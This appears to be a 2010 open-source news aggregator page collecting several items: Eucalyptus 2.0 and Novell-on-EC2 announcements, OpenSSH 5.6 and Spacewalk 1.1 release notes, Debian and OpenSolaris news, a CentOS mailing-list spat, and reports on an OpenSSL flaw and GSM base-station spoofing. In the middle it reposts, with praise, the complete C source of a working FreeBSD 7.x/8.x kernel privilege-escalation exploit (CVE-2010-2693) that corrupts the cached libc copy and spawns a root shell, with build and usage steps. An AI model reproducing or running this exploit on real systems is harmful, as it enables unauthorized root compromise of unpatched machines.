uncompiled.com

Eucalyptus Systems, supplier of Amazon EC2-compatible software for building the private cloud, has brought out version 2.0 of its Eucalyptus open source system.

The Santa Barbara, Calif., company was founded to support the output of the Eucalyptus open source project, founded at the University of California at Santa Barbara’s computer science department. Prof. Rich Wolski and associates produced interfaces compatible with Amazon Web Services’ EC2 APIs and packaged them together as a way to start building out an enterprise cloud.

Eucalyptus 2.0 is the second major release of the open source code. In it, “we have improved scalability all over the product,” said Marten Mickos, CEO, in an interview. The firm provides technical support for Eucalyptus open source code. The open source version is not to be confused with the Eucalyptus commercial Enterprise edition, also labeled 2.0, although based on a pre-2.0 version of the open source code.

The Eucalyptus open source code is issued under the GPL, contains features and functions ahead of the Enterprise edition, and can be freely downloaded. The firm is seeing 12,000 downloads in peak months and Eucalyptus is included in Canonical’s Ubuntu Linux distribution, he said.

Eucalyptus scales across a larger server cluster more easily because the 2.0 version “has been clearer about the segregation of tasks. We no longer locate the cluster controller and the node controller on the same node,” where they sometimes ended up in contention over resources, Mickos noted. The former CEO of MySQL, now part of Oracle, joined Eucalyptus Systems in March.

Version 2.0 supports iSCSI disks as elastic block store volumes and allows the cloud builder to place an iSCSI storage controller on any server in a cluster, including outside the cloud domain of the cluster, if he chooses, Mickos said.

Version 2.0 also supports the open source virtio, an API for virtualizing I/O that is used by the open source KVM hypervisor. KVM is included in distributions of Red Hat Enterprise Linux and Novell’s SUSE Linux Enterprise System. Virtio uses a common set of I/O virtualization drivers that are both efficient and potentially adaptable for use by other hypervisor suppliers, Mickos said. Virtual I/O consists of a virtual machine sending both its communications traffic and storage traffic through the hypervisor to a virtual device, rather than through a server’s network interface card or host bus adapter. From the virtual device, it can be moved off the virtualized server into the network fabric and handled more efficiently there.

Eucalyptus 2.0 also supports retrieval of specific versions of objects stored in Walrus, the Eucalyptus storage system that is compatible with Amazon’s S3 storage service. Users may perform version control on objects as they are stored in Walrus and retrieve a specific version, as needed.

Eucalyptus to some extent now mimics the slogan of the OpenStack project, started recently by Rackspace, which claims it’s building governance software for a million-node cloud, a prospect that even the largest service providers have yet to attain.

“Sure Eucalyptus can support a million-node cloud, but the more important question is how large an application can you run on your cloud” and how effectively can you manage it there with your cloud software. Eucalyptus is concentrating on effective management for private clouds, not massive public infrastructure providers, Mickos said.

Source

OpenSSH 5.6 has just been released. It will be available from the
mirrors listed at http://www.openssh.com/ shortly.

OpenSSH is a 100% complete SSH protocol version 1.3, 1.5 and 2.0
implementation and includes sftp client and server support.

Once again, we would like to thank the OpenSSH community for their
continued support of the project, especially those who contributed
code or patches, reported bugs, tested snapshots or donated to the
project. More information on donations may be found at:

http://www.openssh.com/donations.html

Changes since OpenSSH 5.5
=========================

Features:

* Added a ControlPersist option to ssh_config(5) that automatically
starts a background ssh(1) multiplex master when connecting. This
connection can stay alive indefinitely, or can be set to
automatically close after a user-specified duration of inactivity.

* Hostbased authentication may now use certificate host keys. CA keys
must be specified in a known_hosts file using the @cert-authority
marker as described in sshd(8).

* ssh-keygen(1) now supports signing certificate using a CA key that
has been stored in a PKCS#11 token.

* ssh(1) will now log the hostname and address that we connected to at
LogLevel=verbose after authentication is successful to mitigate
“phishing” attacks by servers with trusted keys that accept
authentication silently and automatically before presenting fake
password/passphrase prompts.

Note that, for such an attack to be successful, the user must have
disabled StrictHostKeyChecking (enabled by default) or an attacker
must have access to a trusted host key for the destination server.

* Expand %h to the hostname in ssh_config Hostname options. While this
sounds useless, it is actually handy for working with unqualified
hostnames:

Host *.*
Hostname %h
Host *
Hostname %h.example.org

* Allow ssh-keygen(1) to import (-i) and export (-e) of PEM and PKCS#8
keys in addition to RFC4716 (SSH.COM) encodings via a new -m option
(bz#1749)

* sshd(8) will now queue debug messages for bad ownership or
permissions on the user’s keyfiles encountered during authentication
and will send them after authentication has successfully completed.
These messages may be viewed in ssh(1) at LogLevel=debug or higher.

* ssh(1) connection multiplexing now supports remote forwarding with
dynamic port allocation and can report the allocated port back to
the user:

LPORT=`ssh -S muxsocket -R0:localhost:25 -O forward somehost`

* sshd(8) now supports indirection in matching of principal names
listed in certificates. By default, if a certificate has an
embedded principals list then the username on the server must match
one of the names in the list for it to be accepted for
authentication.

sshd(8) now has a new AuthorizedPrincipalsFile option to specify a
file containing a list of names that may be accepted in place of the
username when authorizing a certificate trusted via the
sshd_config(5) TrustedCAKeys option. Similarly, authentication
using a CA trusted in ~/.ssh/authorized_keys now accepts a
principals=”name1[,name2,...]” to specify a list of permitted names.

If either option is absent, the current behaviour of requiring the
username to appear in principals continues to apply. These options
are useful for role accounts, disjoint account namespaces and
“user@realm”-style naming policies in certificates.

* Additional sshd_config(5) options are now valid inside Match blocks:

AuthorizedKeysFile
AuthorizedPrincipalsFile
HostbasedUsesNameFromPacketOnly
PermitTunnel

* Revised the format of certificate keys. The new format, identified as
ssh-{dss,rsa}-cert-v01@openssh.com includes the following changes:

– Adding a serial number field. This may be specified by the CA at
the time of certificate signing.

– Moving the nonce field to the beginning of the certificate where
it can better protect against chosen-prefix attacks on the
signature hash (currently infeasible against the SHA1 hash used)

– Renaming the “constraints” field to “critical options”

– Addng a new non-critical “extensions” field. The “permit-*”
options are now extensions, rather than critical options to
permit non-OpenSSH implementation of this key format to degrade
gracefully when encountering keys with options they do not
recognize.

The older format is still supported for authentication and may still
be used when signing certificates (use “ssh-keygen -t v00 …”).
The v00 format, introduced in OpenSSH 5.4, will be supported for at
least one year from this release, after which it will be deprecated
and removed.

BugFixes:

* The PKCS#11 code now retries a lookup for a private key if there is
no matching key with CKA_SIGN attribute enabled; this fixes fixes
MuscleCard support (bz#1736)

* Unbreak strdelim() skipping past quoted strings (bz#1757). For
example, the following directive was not parsed correctly:

AllowUsers “blah blah” blah

* sftp(1): fix swapped args in upload_dir_internal(), breaking
recursive upload depth checks and causing verbose printing of
transfers to always be turned on (bz#1797)

* Fix a longstanding problem where if you suspend scp(1) at the
password/passphrase prompt the terminal mode is not restored.

* Fix a PKCS#11 crash on some smartcards by validating the length
returned for C_GetAttributValue (bz#1773)

* sftp(1): fix ls in working directories that contain globbing
characters in their pathnames (bz#1655)

* Print warning for missing home directory when ChrootDirectory=none
(bz#1564)

* sftp(1): fix a memory leak in do_realpath() error path (bz#1771)

* ssk-keygen(1): Standardise error messages when attempting to open
private key files to include “progname: filename: error reason”
(bz#1783)

* Replace verbose and overflow-prone Linebuf code with
read_keyfile_line() (bz#1565)

* Include the user name on “subsystem request for …” log messages

* ssh(1) and sshd(8): remove hardcoded limit of 100 permitopen clauses
and port forwards per direction (bz#1327)

* sshd(8): ignore stderr output from subsystems to avoid hangs if a
subsystem or shell initialisation writes to stderr (bz#1750)

* Skip the initial check for access with an empty password when
PermitEmptyPasswords=no (bz#1638)

* sshd(8): fix logspam when key options (from=”…” especially) deny
non-matching keys (bz#1765)

* ssh-keygen(1): display a more helpful error message when $HOME is
inaccessible while trying to create .ssh directory (bz#1740)

* ssh(1): fix hang when terminating a mux slave using ~. (bz#1758)

* ssh-keygen(1): refuse to generate keys longer than
OPENSSL_[RD]SA_MAX_MODULUS_BITS, since we would refuse to use
them anyway (bz#1516)

* Suppress spurious tty warning when using -O and stdin is not a tty
(bz#1746)

* Kill channel when pty allocation requests fail. Fixed stuck client
if the server refuses pty allocation (bz#1698)

Portable OpenSSH Bugfixes:

* sshd(8): increase the maximum username length for login recording
to 512 characters (bz#1579)

* Initialize the values to be returned from PAM to sane values in
case the PAM method doesn’t write to them. (bz#1795)

* Let configure find OpenSSL libraries in a lib64 subdirectory.
(bz#1756)

Checksums:
==========

– SHA1 (openssh-5.6.tar.gz) = fa5ac394b874d6709031306b6ac5c48399697f7f
– SHA1 (openssh-5.6p1.tar.gz) = 347dd39c91c3529f41dae63714d452fb95efea1e

Reporting Bugs:
===============

- Please read http://www.openssh.com/report.html
Security bugs should be reported directly to openssh@openssh.com

OpenSSH is brought to you by Markus Friedl, Niels Provos, Theo de Raadt,
Kevin Steves, Damien Miller, Darren Tucker, Jason McIntyre, Tim Rice and
Ben Lindstrom.

Source

Really nice work from Jon.

/*
* cve-2010-2693.c
*
* FreeBSD Kernel 7.x/8.x mbuf M_RDONLY Privilege Escalation
* Jon Oberheide
* http://jon.oberheide.org
*
* Information:
*
* http://security.freebsd.org/advisories/FreeBSD-SA-10:07.mbuf.asc
*
* The read-only flag is not correctly copied when a mbuf buffer reference
* is duplicated. When the sendfile(2) system call is used to transmit
* data over the loopback interface, this can result in the backing pages
* for the transmitted file being modified, causing data corruption.
*
* Usage:
*
* $ gcc cve-2010-2693.c -o cve-2010-2693 -lpthread
* $ ./cve-2010-2693
* …
* # id
* uid=0(root) …
*
* Notes:
*
* Exploiting the mbuf vulnerability, we corrupt the in-memory copy of libc
* stored in the filesystem buffer cache with some shellcode. In particular,
* we overwrite getuid with a sled + mov $0×0,%eax + ret. Then, we spawn the
* setuid ‘su’ to get an instant root shell.
*
* The libc copy in the fs buffer cache will stick around for a while so you
* might want to remount/reboot after you’re done with your root shell.
*
* Kingcope beat me to this one by a long shot but I might as well still
* release it since it takes a slightly different approach. :-)
*
* Tested on FreeBSD 8.0-RELEASE, but should work on any unpatched 7.x/8.x.
*/

#include
#include
#include
#include
#include #include
#include
#include
#include
#include

#define SHELLCODE “\xb8\x00\x00\x00\x00\xc3″
#define SHELLCODE_LEN 6

void *
run_listener(void *arg)
{
char buf[4096];
int ret, sock, conn;
struct sockaddr_in addr;

sock = socket(AF_INET, SOCK_STREAM, 0);
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(2693);
addr.sin_addr.s_addr = inet_addr(“127.0.0.1″);

ret = bind(sock, (struct sockaddr *) &addr, sizeof(addr));
if (ret < 0) {
printf("[-] couldn't bind to listener socket\n");
exit(1);
}

ret = listen(sock, 1);
if (ret < 0) {
printf("[-] couldn't listen on socket\n");
exit(1);
}

conn = accept(sock, NULL, NULL);
if (conn < 0) {
printf("[-] couldn't accept incoming connection\n");
exit(1);
}

while(1) {
ret = read(conn, &buf, sizeof(buf));
if (ret < 0) {
break;
}
}

return NULL;
}

int
main(int argc, char *argv[])
{
FILE *fp;
char libc[64];
int ret, sock, fd, fsize, flags, chunk = 0;
int getuid, offset, writes;
off_t bytes, sent = 0;
struct sockaddr_in addr;
struct stat statbuf;
pthread_t listener;
fd_set wset;

char sc[256 + SHELLCODE_LEN];
memset(sc, 0x90, sizeof(sc));
memcpy(sc + (sizeof(sc) - SHELLCODE_LEN), SHELLCODE, SHELLCODE_LEN);

printf("[+] checking for setuid /usr/bin/su binary...\n");

ret = stat("/usr/bin/su", &statbuf);
if (ret < 0) {
printf("[-] couldn't find setuid /usr/bin/su binary!\n");
exit(1);
}

printf("[+] checking for suitable libc library in /lib...\n");

memset(libc, 0x0, sizeof(libc));
fp = popen("ls -1 /lib/libc.so.*", "r");
fscanf(fp, "%s", libc);
fclose(fp);

printf("[+] found libc at %s\n", libc);

fp = popen("nm -D /lib/libc.so.* | grep \"W getuid\"", "r");
fscanf(fp, "%x", &getuid);
fclose(fp);

printf("[+] found getuid function at 0x%08x\n", getuid);

offset = getuid - 2048;
writes = offset / 256;

printf("[+] target: 0x%08x, adjusted: 0x%08x, writes: %d\n", getuid, offset, writes);

printf("[+] spawning listener thread...\n");

if (pthread_create(&listener, NULL, run_listener, NULL) != 0){
printf("[-] couldn't create listener thread!\n");
exit(1);
}
sleep(3);

printf("[+] connecting to listener thread...\n");

sock = socket(AF_INET, SOCK_STREAM, 0);
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(2693);
addr.sin_addr.s_addr = inet_addr("127.0.0.1");

ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr));
if (ret < 0) {
printf("[-] couldn't connect to listening thread!\n");
exit(1);
}

printf("[+] initiating exploit via sendfile...\n");

fd = open(libc, O_RDONLY);
if (fd < 0) {
printf("[-] couldn't open target libc library!\n");
exit(1);
}

ret = fstat(fd, &statbuf);
if (ret < 0) {
printf("[-] couldn't stat target libc library!\n");
exit(1);
}

fsize = statbuf.st_size;
flags = fcntl(fd, F_GETFL);
flags |= O_NONBLOCK;
fcntl(fd, F_SETFL, flags);

while (fsize > 0) {
FD_ZERO(&wset);
FD_SET(sock, &wset);
ret = select(fd + 1, NULL, &wset, NULL, NULL);
if (ret < 0) {
continue;
}

if (chunk > 0) {
bytes = 0;
ret = sendfile(fd, sock, 256 * writes, chunk, NULL, &bytes, 0);
if (ret < 0) {
continue;
}
chunk -= bytes;
fsize -= bytes;
sent += bytes;
continue;
}

chunk = 2048;
write(sock, sc, sizeof(sc));
}

printf("[+] exploit complete!\n");
printf("[+] spawning root shell...\n");

system("su");

return 0;
}

Source

Novell disclosed details of a deal with Amazon Web Services (AWS) to provide hourly pricing and support services for SUSE Linux Enterprise Server (SLES) 10 and 11 on Amazon Elastic Compute Cloud (Amazon EC2). The announcement was made last week at LinuxCon in Boston.

Under the contract, both end customers and independent software vendors will pay only for the hours of SLES they use. In addition, Novell is providing a maintenance contract on AWS to allow customers to keep SLES current with bug fixes, patches, and features.

Amazon EC2 customers can buy maintenance subscriptions for enterprise Linux directly on Amazon’s site without signing a separate license agreement, according to Novell.
“Amazon Web Services provides enterprise customers with secure, reliable, and utility-priced computing infrastructure as an on-demand service,” said Terry Wise, director of business development at AWS, in a statement. “We are pleased to see Novell providing an easy way for customers to leverage the enterprise class SUSE Linux distribution on the Amazon EC2 platform. This offering provides enterprise customers and ISVs with a commercially maintained and supported Linux distribution that is easy-to-use and purchase.”

Novell solution providers participating in the developer’s SUSE Cloud Program can resell Novell technical support or offer customers their own support services, backed by Novell’s offerings. Under the SUSE Cloud Program, Novell provides partners with certified Linux applications, a versatile Linux platform, and SUSE Studio, a solution for building cloud-based workloads, said Markus Rex, senior VP and general manager of open platform solutions at the company.

AWS, which expects to hit the $20-billion mark, joins service providers such as Fujitsu, IBM, Tencent, and Vodacom Business in the SUSE Cloud Program. The program includes more than 5,000 ISV applications, according to Novell.

“We are pleased that industry leaders like Amazon Web Services are able to leverage the SUSE Cloud Program to provide even more choices to their customers,” Rex said in a statement.

Source

After several delays and many months behind schedule, Debian 6.0 appears to be one step closer to release. As of August 6, the testing branch is now frozen except for fixes and translation updates. This puts Final on track to possibly be released by the end of the year.

Neil McGovern, Debian Release Team manager, wrote in from DebCon10 in New York to announce this milestone for Debian 6.0. Freeze had been delayed until Python 2.6 migration and updating Glibc was completed. Now only critical bug fixes, documentation changes, and translation updates will be accepted into the Testing branch as a general rule. This will give developers the opportunity to polish 6.0 for final release. The last two major versions have seen a four month stabilization period before final release, allowing estimates that 6.0 will arrive sometime in December.

It was over a year ago that Debian developers had announced a fixed release schedule much like other popular Linux distributions, but scheduling freeze dates every two years instead of release dates. 6.0 was scheduled to be frozen in December 2009 with final release estimated for Spring of this year. The freeze was delayed at that time due to a large number of critical bugs, and while the number has decreased, it is still quite high at 554 affecting Squeeze. That number could very well delay release until early Spring 2011.

The upcoming release will bring some exciting changes. Startup, Debian’s version of Upstart, is a parallel booting system that will bring faster system starts. GNOME 2.30, KDE 4.4.5, Linux 2.6.32, X.org 7.5, GCC 4.4, and OpenOffice 3.2.1 are on the menu as well.

Live Squeeze Alpha2 was released July 22.

Source

Oracle has finally announced their plans for Solaris operating system and OpenSolaris platform and it’s not good. OpenSolaris is now effectively dead and there will not be anymore OpenSolaris releases — including the long-delayed 2010 release. Solaris will still live-on and Oracle is busy working on Solaris 11 for a release next year and there will be a “Solaris 11 Express” as being a similar product to OpenSolaris, but it will only ship after Oracle’s enterprise release.

After being quiet for months in regards to their OpenSolaris plans — to the point that the OpenSolaris governing board was going to kill itself off this month if Oracle didn’t come clean about their intentions (but now Oracle has effectively put a bullet in their head instead) and then earlier this month the Illumos project turned its lights on as effectively a fork of OpenSolaris.

This Solaris road-map was done via internal Oracle e-mail communication, but since then it was leaked onto the Internet and can be found on the OpenSolaris mailing list.

Source

Hello everyone,

Spacewalk 1.1 has been released!

Server:

* http://spacewalk.redhat.com/yum/1.1/RHEL/5//
* http://spacewalk.redhat.com/yum/1.1/Fedora/12//
* http://spacewalk.redhat.com/yum/1.1/Fedora/13//

Client:

* http://spacewalk.redhat.com/yum/1.1-client/RHEL/5//
* http://spacewalk.redhat.com/yum/1.1-client/Fedora/12//
* http://spacewalk.redhat.com/yum/1.1-client/Fedora/13//

For new installations, consult:

* https://fedorahosted.org/spacewalk/wiki/HowToInstall

For upgrades, consult:

* https://fedorahosted.org/spacewalk/wiki/HowToUpgrade

Features and enhancements:

* First Spacewalk release built in a publicly available build system
- http://koji.spacewalkproject.org/koji

* Spacewalk 1.1 runs on Fedora 13

* Introduction of spacecmd, a command line interface to Spacewalk
- https://fedorahosted.org/spacewalk/wiki/spacecmd

* Support for synchronization of comps files
- https://fedorahosted.org/spacewalk/wiki/Features/CompsSyncing

* support for staging content
- ability to have all updates pulled off Spacewalk onto registered
systems prior to the start of maintenance window

* support for eliminating orphaned (duplicate) profiles
- https://fedorahosted.org/spacewalk/wiki/DuplicateProfiles

* new API calls:
- channel.software.getChannelLastBuildById
- configchannel.listSubscribedSystems
- kickstart.profile.downloadRenderedKickstart
- org.setSoftwareFlexEntitlements
- schedule.rescheduleActions
- system.convertToFlexEntitlement
- system.deletePackageProfile
- system.deleteSystem
- system.listDuplicatesByHostname
- system.listDuplicatesByIp
- system.listDuplicatesByMac
- system.listEligibleFlexGuests
- system.listFlexGuests
- system.listLatestAvailablePackage
- system.listPackageProfiles
- systemgroup.scheduleApplyErrataToActive

* localization updates

Known issues:

* Wrong tomcat6 directory permissions on Fedora 13
- https://bugzilla.redhat.com/show_bug.cgi?id=574593
- https://bugzilla.redhat.com/show_bug.cgi?id=586364
- https://bugzilla.redhat.com/show_bug.cgi?id=605335
- workaround:
chmod g+w /var/log/tomcat6 /etc/tomcat6/Catalina/localhost \
/var/cache/tomcat6 /var/cache/tomcat6/temp /var/cache/tomcat6/work

* cobbler – related SELinux denials on Fedora 12 and Fedora 13:
- https://bugzilla.redhat.com/show_bug.cgi?id=620503
- https://bugzilla.redhat.com/show_bug.cgi?id=621095
- solution: install updated selinux-policy-targeted as noted in
the above bugs

* Deprecation warning during osa-dispatcher start on Fedora 12
and Fedora 13:
- https://bugzilla.redhat.com/show_bug.cgi?id=621204
- https://bugzilla.redhat.com/show_bug.cgi?id=621206

* Documentation search does not work, other searches are unaffected

Contributors:

Thank you goes out to the following people who contributed to
Spacewalk 1.1 release:

* Aron Parsons
* Colin Coe
* James Hogarth
* Joshua Roys
* Lukáš Ďurfina
* Maxim Burgerhout
* Paul Morgan
* Satoru SATOH

Regards
Milan Zázrivec

Source

Security expert Georgi Guninski has pointed out a security issue in the 1.0 branch of OpenSSL that potentially allows SSL servers to compromise clients. Apparently the hole can be exploited simply by sending a specially crafted certificate to the client, causing deallocated memory to be accessed in the ssl3_get_key_exchange function (in ssl\s3_clnt.c). While this usually only causes an application to crash, it can potentially also be exploited to execute injected code.

Guninski included a certificate and a flawed key for recreating the problem in the report he released on the Full Disclosure mailing list. When tested briefly by the The H’s associates at heise Security on an current Ubuntu 10.04 system with OpenSSL 0.9.8k, a certificate belonging to an RSA key of only 4006 bits in length (and where q is not prime) only produced a warning that the certificate was flawed.

As virtually none of the Linux distributions use OpenSSL 1.0.x, the hole is unlikely to create major concerns. An update has yet to be released by the OpenSSL developers, but the issue is already being discussed on the OpenSSL developer mailing list.

Source

So normally Linux User Groups (LUGs) are a safe-haven for Q&A. Not tonight. Tonight a CentOS develop named Russ Herrold needed a soapbox. He took what is an often asked question of any distribution “Why don’t the packages remain more up-to-date?” and used it to not only be a complete asshole about the matter, but even linked the mailing list to a CentOS newsletter with his featurette/biography.

For what it’s worth, the question had been answers a few times before this e-mail was even sent, in much nicer and helpful ways. To be fair Larry got a bit over-excited in the first place, but having a CentOS developer reply like this is strikingly unnecessary.

Please Linux developers and OSS contributors around the world, don’t be this guy.

Date: Fri, 6 Aug 2010 18:56:18 -0400 (EDT)
From: R P Herrold
To: Larry Siden
cc: LUGWASH Subject: [WLUG] out-of-date packages on Redhat/Centos

On Thu, 5 Aug 2010, Larry Siden wrote:

> I’ve been using Linux at home for about 7 or 8 years now, first with Gentoo
> (for masochists, I assure you!), and then Ubuntu (so I could have a life
> again). Now I’m beginning to work on several apps on hosted sites that uses
> RH/Centos (I’m not sure which, I just know that I have to install everything
> with yum). When I got my own VPS, I had a choice between Centos and Ubuntu
> 8.10 (again, out-of-date!) and I chose Centos so that I could get to know it
> better.
>
> Whats been “grinding my gears” is that almost everything I use in my day to
> day work is out-of-date.
… snip rant …
> Is there a reason everything has to be so f@#$king out of date on Centos
> installs? Are there more current repositories that I can point yum to, at
> least on the systems I have root access to, without breaking anything?

Well, several reasons actually. Take a deep breath or six if
it ‘grinds your gears’ and consider WHY RHEL/CentOS exist

CentOS is a distribution intended for people who consider a
computer a tool for getting a function done, rather than a toy
to be played with. It does not hurt the CentOS folks feelings
a bit that you want more — but you are not gonna’ get it from
CentOS — perhaps from the adjunct archives mentioned. It is
just not our mission nor goal to cater to such

RHEL, and CentOS are for people who just want a system to run
[and run and run and run, for a seven year span without
physically touching the unit if need be], to be securable, to
have regular updates, and dont feel the need to chase the
latest fad

As a production colo, or VPS unit is going to (properly
adminned) NOT have a GUI interface, I don’t even notice the
window manager ‘art’ or colors it might use when started in X
– it is never going to be in R/L 5 anyway. I don’t care it
lacks an audio player by default that handles patent
encumbered MP3 support as the fans in the DC drown out good
listening anyway. I don’t care it give a hoot that wireless
support is a PITA, as it is going to be running all packets
over wired ethernet anyway. I LIKE IT that volatile devices
such as USB thumb drives require me to mount them (as I am
going to remove the automounter, anyway) to prevent casual
exposure of data

We have full doco at: http://www.centos.org/docs/, a ton of
original content at http://wiki.centos.org/, forums, mailing
lists, IRC support channels, and more.

Not for everyone, just for folks who don’t want to spend time
tending computers, and would rather get work done.

see:

http://wiki.centos.org/Newsletter/0904

bullet 5

– Russ herrold
herrold@centos.org

A researcher at the DefCon hackers’ meet has demonstrated kit for spoofing GSM base stations, allowing even those on a limited budget to intercept phone calls and text messages.

The audience attending the talk by Chris Paget were able to see their own handsets transferring to his spoofed base station, with calls receiving a recorded message explaining that the security had been compromised, Associated Press reports. The demonstration would presumably have been a lot less impressive if Las Vegas had better 3G coverage.

The basis of the attack isn’t new: the attacker sets up a base station advertised as belonging to a compatible network operator and handsets locally switch to the stronger signal. In a live attack the base station then connects to the real cellar network and passes authentication tokens back and forth as though it wasn’t there.

GSM communications are supposed to be encrypted between the genuine network at the handset, but in some countries strong encryption isn’t allowed so the network informs the handset not to encrypt the communications. The handset is supposed to pop up a warning when this happens, but doesn’t, so rogue base stations can ask the handset not to encrypt anything and then listen in.

The 2G GMS standard does not mandate mutual authentication – the handset must prove its identity to the network, but the network is not required to return the favour. That’s always made 2G networks open to this kind of abuse; the only difference is that the kit to do it has got a lot cheaper over the years. 3G standards do require such authentication, so they are immune from this kind of attack.

During the demonstration, Paget pointed out that one could jam the 3G signal (at 2.1GHz), forcing handsets to drop back to 2G and open themselves to the vulnerability. That’s true, but will cease to be possible (or at least will get a lot more difficult) once operators start deploying 3G technology on the 2G frequencies.

“GSM is broken – it’s just plain broken,” said Paget during the demonstration, though he could have added that the standard is no more broken than it was yesterday – the break just got cheaper to exploit.

Source